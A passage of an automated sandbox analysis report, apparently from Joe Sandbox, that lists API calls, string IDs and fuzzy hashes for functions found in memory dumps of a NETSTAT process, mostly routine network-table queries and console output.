                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 006817C3
                                                                                                                                                                            • exit.MSVCRT ref: 006817EC
                                                                                                                                                                            • _strupr.MSVCRT ref: 00681812
                                                                                                                                                                            • sscanf_s.MSVCRT ref: 00681920
                                                                                                                                                                            • toupper.MSVCRT ref: 00681946
                                                                                                                                                                            • toupper.MSVCRT ref: 00681963
                                                                                                                                                                            • toupper.MSVCRT ref: 00681982
                                                                                                                                                                            • toupper.MSVCRT ref: 0068199F
                                                                                                                                                                            • toupper.MSVCRT ref: 006819BC
                                                                                                                                                                            • toupper.MSVCRT ref: 006819D6
                                                                                                                                                                            • toupper.MSVCRT ref: 006819F0
                                                                                                                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00681B1D
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00681B36
                                                                                                                                                                              • Part of subcall function 0068485E: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,000000FF,00000000,00000000,00000001,00000001,?,00682E0C,00000000,00002718,?,00000000,000000FF), ref: 00684885
                                                                                                                                                                              • Part of subcall function 0068485E: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(000000FF,?,00682E0C,00000000,00002718,?,00000000,000000FF), ref: 0068489D
                                                                                                                                                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 00681C61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: toupper$_fileno$FormatFreeLocalMessage_setmodefgetpos$HeapInformationLanguageSleepStartupThread__iob_func_strupr_writeexitfwprintfsscanf_s
                                                                                                                                                                            • String ID: $%lu$ICMP$ICMPV6$IPV6$TCP$TCPV6$UDP$UDPV6
                                                                                                                                                                            • API String ID: 2214462882-2943784616
                                                                                                                                                                            • Opcode ID: ace3b1188f4e10b36c14f9c78dff2cd49518ae83b9ca65593128f6f01a6cafa5
                                                                                                                                                                            • Instruction ID: ef7c6e7b4bd9df087534cfe5133d2b30010e6d8e47abf3b8728edb9f87d26f9c
                                                                                                                                                                            • Opcode Fuzzy Hash: ace3b1188f4e10b36c14f9c78dff2cd49518ae83b9ca65593128f6f01a6cafa5
                                                                                                                                                                            • Instruction Fuzzy Hash: 23F1C2705483419FDB286B2498597BA7BEFAF4B710F540A1EF5C69E291DB34C8838B06
                                                                                                                                                                            Function 00682167 Relevance: 50.1, APIs: 33, Instructions: 595networkmemoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,000000FF), ref: 0068217A
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068228D
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068229D
                                                                                                                                                                            • InternalGetTcpTableWithOwnerModule.IPHLPAPI(?,00000000,00000000), ref: 006822E2
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682324
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682335
                                                                                                                                                                            • InternalGetTcpTable2.IPHLPAPI(?,00000000,00000000), ref: 00682377
                                                                                                                                                                            • htons.WS2_32(?), ref: 006823B5
                                                                                                                                                                            • htons.WS2_32(?), ref: 006823C6
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00682406
                                                                                                                                                                            • InternalGetBoundTcpEndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00682419
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068243D
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068244E
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0068248A
                                                                                                                                                                            • htons.WS2_32(?), ref: 006824EA
                                                                                                                                                                            • htons.WS2_32(?), ref: 006824FA
                                                                                                                                                                            • InternalGetTcp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00682540
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682582
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682593
                                                                                                                                                                            • InternalGetTcp6Table2.IPHLPAPI(00000000,00000000,00000000), ref: 006825D1
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068260F
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682620
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00682660
                                                                                                                                                                            • InternalGetBoundTcp6EndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00682677
                                                                                                                                                                            • htons.WS2_32(?), ref: 006826AB
                                                                                                                                                                            • htons.WS2_32(?), ref: 006826BC
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 006826FC
                                                                                                                                                                            • InternalGetUdpTableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00682718
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682748
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00682780
                                                                                                                                                                            • InternalGetUdp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00682799
                                                                                                                                                                            • htons.WS2_32(?), ref: 006827C9
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 006827FE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: htons$Internal$Heap$FreeTable$ModuleOwnerWith$Tcp6$BoundEndpointTable2$ProcessUdp6
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1690255193-0
                                                                                                                                                                            • Opcode ID: 25a8d0a3b5e43e3df4cc5f6484d4215a6a67c7d05ea5ae64a3d6ac938a1fd3d5
                                                                                                                                                                            • Instruction ID: 310a79b0ee7edb3a7f2e1e6832439f8fde46a5ef353d5e51f0ad97e951040f0b
                                                                                                                                                                            • Opcode Fuzzy Hash: 25a8d0a3b5e43e3df4cc5f6484d4215a6a67c7d05ea5ae64a3d6ac938a1fd3d5
                                                                                                                                                                            • Instruction Fuzzy Hash: D9326971D00215EFCB25EFA5C894AEEB7F2FF48301F24821AE955A7340D738A941CB60
                                                                                                                                                                            Function 00684B96 Relevance: 40.8, APIs: 17, Strings: 6, Instructions: 517COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • fprintf.MSVCRT ref: 00684BF0
                                                                                                                                                                            • GetUdpStatisticsEx.IPHLPAPI(00000008,00000002), ref: 00684C1E
                                                                                                                                                                              • Part of subcall function 00686139: __iob_func.MSVCRT ref: 0068613E
                                                                                                                                                                            • GetTcpStatisticsEx.IPHLPAPI(00000008,00000017), ref: 00685161
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Statistics$__iob_funcfprintf
                                                                                                                                                                            • String ID: %s $%2d.$%3d.$%d.$ReadTable: type = %d$value=%8d oid=
                                                                                                                                                                            • API String ID: 2761504588-3074728934
                                                                                                                                                                            • Opcode ID: 38e989ff59e4fc39afd2fff49783efe54ad4f01a4953148b87afc1b136960d99
                                                                                                                                                                            • Instruction ID: b96fa34526f2f172c4b2c4fcfc1b49f1af22f95261ee2e13716572798b6c8b05
                                                                                                                                                                            • Opcode Fuzzy Hash: 38e989ff59e4fc39afd2fff49783efe54ad4f01a4953148b87afc1b136960d99
                                                                                                                                                                            • Instruction Fuzzy Hash: 41029031D04206DFCB24EFA8D949AAEBBB7BB05300F24435AE546AB741DF719D42CB90
                                                                                                                                                                            Function 006838D2 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 206COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 0068391B
                                                                                                                                                                            • OpenProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000410,00000000,?,00000000,?,00000000), ref: 00683937
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00683B39
                                                                                                                                                                            • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00683B44
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$LibraryLocalOpenProcessmemset
                                                                                                                                                                            • String ID: I_QueryTagInformation$\advapi32.dll$rundll32.exe$svchost.exe$Dh
                                                                                                                                                                            • API String ID: 276527812-598021986
                                                                                                                                                                            • Opcode ID: 62453b7b78fdd2c15e45ffea5b803f05b60b5905e20cbc55cefbe00e834c9477
                                                                                                                                                                            • Instruction ID: 698ab88379c6003cc9c62f8c3e9e4ec79bb0a512c83bda147362b428d76d6431
                                                                                                                                                                            • Opcode Fuzzy Hash: 62453b7b78fdd2c15e45ffea5b803f05b60b5905e20cbc55cefbe00e834c9477
                                                                                                                                                                            • Instruction Fuzzy Hash: C561D5B19002246FEB64BF24DC49EBAB36FDB44710F1043A9F51AA7281EE719E84CB14
                                                                                                                                                                            Function 00681CFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,00000000,?,?,?,?,?,?,00682809), ref: 00681D15
                                                                                                                                                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,00682809), ref: 00681D1C
                                                                                                                                                                            • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,?,00000010,00000000,00000000), ref: 00681D48
                                                                                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00681D56
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                                                                            • String ID: (h
                                                                                                                                                                            • API String ID: 3874597930-4003767645
                                                                                                                                                                            • Opcode ID: b7e497c7eb4abc566b20386025dfa36f79d8279631f91a7b38568625414dbb29
                                                                                                                                                                            • Instruction ID: c05437c3dce5ff51c9eb27bb943902e2b4094578f22f12c8b58e1c186b292ee5
                                                                                                                                                                            • Opcode Fuzzy Hash: b7e497c7eb4abc566b20386025dfa36f79d8279631f91a7b38568625414dbb29
                                                                                                                                                                            • Instruction Fuzzy Hash: EB01FB70A01219BFDB10AFA5DC09AEFBFBDEF09750F504259E905A7250CB709A05CBA5
                                                                                                                                                                            Function 00681C89 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0068222F), ref: 00681CA2
                                                                                                                                                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0068222F), ref: 00681CA9
                                                                                                                                                                            • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00681CD9
                                                                                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00681CE7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                                                                            • String ID: /"h
                                                                                                                                                                            • API String ID: 3874597930-680228741
                                                                                                                                                                            • Opcode ID: a6f1e543ea54a1861584f25101b18cd98458f82a091f3877bec40599ee8effb6
                                                                                                                                                                            • Instruction ID: 0fa8b4792b1c1b644923cadd6b7bb5874609172255ab19b196e9572dc83f1614
                                                                                                                                                                            • Opcode Fuzzy Hash: a6f1e543ea54a1861584f25101b18cd98458f82a091f3877bec40599ee8effb6
                                                                                                                                                                            • Instruction Fuzzy Hash: F301FF70901219ABDB10AFA5DC09AEFBFBDFF09750F504159A501E7250CB748A05CBA1
                                                                                                                                                                            Function 00685C30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00685D66,00681000), ref: 00685C37
                                                                                                                                                                            • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(f]h,?,00685D66,00681000), ref: 00685C40
                                                                                                                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00685D66,00681000), ref: 00685C4B
                                                                                                                                                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00685D66,00681000), ref: 00685C52
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                            • String ID: f]h
                                                                                                                                                                            • API String ID: 3231755760-4284982515
                                                                                                                                                                            • Opcode ID: 5d4d73faed2c7e3f98ab71b3fae522d8f7ab8fb248726729c9b4ea922b93a74b
                                                                                                                                                                            • Instruction ID: 081f604235563296232537306dce7e1499f37e82c946da67859d8f93b907008b
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d4d73faed2c7e3f98ab71b3fae522d8f7ab8fb248726729c9b4ea922b93a74b
                                                                                                                                                                            • Instruction Fuzzy Hash: E2D01232040304BFC7102BE1EC0CA4A3F2AEB44312F845600F30D87020DF314489DB51
                                                                                                                                                                            Function 00685FE5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00686012
                                                                                                                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00686021
                                                                                                                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0068602A
                                                                                                                                                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00686033
                                                                                                                                                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00686048
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                            • Opcode ID: c8380f786d8a0ebae8fa1a6685a9e8fdace677405deb564680587443565ffd67
                                                                                                                                                                            • Instruction ID: 98ca1eb1e5d6bb84225c34cc938d8b0a7255723cf8d33198db1bb0e8cc5f8331
                                                                                                                                                                            • Opcode Fuzzy Hash: c8380f786d8a0ebae8fa1a6685a9e8fdace677405deb564680587443565ffd67
                                                                                                                                                                            • Instruction Fuzzy Hash: 661118B1D01208EFCB11DFB8DA4869EB7F6FF58310FA15AA5E502E7250EB309A008B44
                                                                                                                                                                            Function 006858B6 Relevance: 4.6, APIs: 3, Instructions: 50memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,000000FF), ref: 006858E7
                                                                                                                                                                            • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 006858FC
                                                                                                                                                                            • FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 0068590F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3429775523-0
                                                                                                                                                                            • Opcode ID: 4c93aa3a733c309acd1dd2790c2e35265dedb9784929cdbaab343861525c6e32
                                                                                                                                                                            • Instruction ID: 185498042c3990da7c8dae19645aeccd7dae5daf2a67dba08438eef1875caa10
                                                                                                                                                                            • Opcode Fuzzy Hash: 4c93aa3a733c309acd1dd2790c2e35265dedb9784929cdbaab343861525c6e32
                                                                                                                                                                            • Instruction Fuzzy Hash: BA011AB191020AAFDF00DFE4CD899BEB7B9FB08300F90166AE512A3140DB749A05CB20
                                                                                                                                                                            Function 00685DC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00005D70), ref: 00685DC5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                            • Opcode ID: f61d76d868f8ebb02eb65a9e8bd707fd5856ee8e2013446031866fcf2b1b7f00
                                                                                                                                                                            • Instruction ID: 1841b24def8d8ae7c57c8fa7ad3c6c5482eef932eafc0b045ea736a2b2ad6a94
                                                                                                                                                                            • Opcode Fuzzy Hash: f61d76d868f8ebb02eb65a9e8bd707fd5856ee8e2013446031866fcf2b1b7f00
                                                                                                                                                                            • Instruction Fuzzy Hash: 089002702D1F005E8740A7705D0D50525A25E586027C21650A642C9094DF5040445B15
                                                                                                                                                                            Function 00684724 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 124memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • fflush.MSVCRT ref: 00684740
                                                                                                                                                                              • Part of subcall function 00684530: _fileno.MSVCRT ref: 0068453B
                                                                                                                                                                              • Part of subcall function 00684530: _get_osfhandle.MSVCRT ref: 00684542
                                                                                                                                                                            • _fileno.MSVCRT ref: 00684760
                                                                                                                                                                            • _setmode.MSVCRT ref: 00684768
                                                                                                                                                                            • wcschr.MSVCRT ref: 0068478B
                                                                                                                                                                            • _fileno.MSVCRT ref: 006847B1
                                                                                                                                                                            • _setmode.MSVCRT ref: 006847B9
                                                                                                                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0068203C), ref: 006847D7
                                                                                                                                                                            • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000,?,?,?,?,?,?,?,0068203C,00000000,?,00000000,000000FF), ref: 006847E7
                                                                                                                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,?,0068203C), ref: 00684805
                                                                                                                                                                            • _fileno.MSVCRT ref: 00684812
                                                                                                                                                                            • _write.MSVCRT ref: 0068481A
                                                                                                                                                                            • fwprintf.MSVCRT ref: 0068482B
                                                                                                                                                                            • fflush.MSVCRT ref: 00684835
                                                                                                                                                                            • _fileno.MSVCRT ref: 0068483E
                                                                                                                                                                            • _setmode.MSVCRT ref: 00684846
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00684853
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
                                                                                                                                                                            • String ID: %ls$< h
                                                                                                                                                                            • API String ID: 2233937912-358708526
                                                                                                                                                                            • Opcode ID: c21246baeec8aa230ab8ca2e8a2e371a8e321b65c3bff9bac818d98c45d0b137
                                                                                                                                                                            • Instruction ID: 608ac2bccc40b84a426586da7661fc4a92fce21e05e5fc8da831a0cd917c0ceb
                                                                                                                                                                            • Opcode Fuzzy Hash: c21246baeec8aa230ab8ca2e8a2e371a8e321b65c3bff9bac818d98c45d0b137
                                                                                                                                                                            • Instruction Fuzzy Hash: 49319072900216FFEB116BA0EC4DFEE7B7AEB45721F604629F511E2290EF7499018B54
                                                                                                                                                                            Function 00684945 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • time.MSVCRT(00000000,00000000,000000FF), ref: 0068495F
                                                                                                                                                                            • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00684975
                                                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0068497F
                                                                                                                                                                            • LoadLibraryExA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000,?,00000000), ref: 006849C7
                                                                                                                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,SnmpMgrOidToStr), ref: 006849D7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryErrorLastLibraryLoadProcSystemtime
                                                                                                                                                                            • String ID: SnmpExtensionInit$SnmpExtensionQuery$SnmpMgrOidToStr
                                                                                                                                                                            • API String ID: 698272139-2433094189
                                                                                                                                                                            • Opcode ID: 4d6c639ba7aad67b50a61a5ee4da02b0aa0cd40707b9d73e91d898387c32be62
                                                                                                                                                                            • Instruction ID: 9cfb5cb3dd0dfb98d42394f8726132c617a807b02356fd50d943a0b182152de5
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d6c639ba7aad67b50a61a5ee4da02b0aa0cd40707b9d73e91d898387c32be62
                                                                                                                                                                            • Instruction Fuzzy Hash: C331E77160021ABFCB14EFB0DD49AEA37AFAB04300B10539AE945E7240DF70CE45CB90
                                                                                                                                                                            Function 03182890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            • Opcode ID: 65f8ca5edbbf6d8abc44df2caa3a8f6fd60cce15f357e2a1a1521daf25ef57d2
                                                                                                                                                                            • Instruction ID: 780c30426e0c793536f634bef622640307accc13fc9daa6788257491f31680aa
                                                                                                                                                                            • Opcode Fuzzy Hash: 65f8ca5edbbf6d8abc44df2caa3a8f6fd60cce15f357e2a1a1521daf25ef57d2
                                                                                                                                                                            • Instruction Fuzzy Hash: 9251E7B5E00216BFCF25EB98889097EF7F8BF0D2007158969E465D7641D334DE518BA4
                                                                                                                                                                            Function 031F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                                            • Opcode ID: fee2cf9eb3fa308f0dc9dff7b260952a4fa3e0966d9992f5a3be9874afbd5e71
                                                                                                                                                                            • Instruction ID: 16581ce90b37c8d515dc9c7c0b59331b8a32c9cac5e3c5d5cb20521e0fcc2845
                                                                                                                                                                            • Opcode Fuzzy Hash: fee2cf9eb3fa308f0dc9dff7b260952a4fa3e0966d9992f5a3be9874afbd5e71
                                                                                                                                                                            • Instruction Fuzzy Hash: 125106B9A04A45AFDB30DF9CC8908BEB7F9EB4C200B048C5AE6A5D7641D7B4DA418760
                                                                                                                                                                            Function 006845AB Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
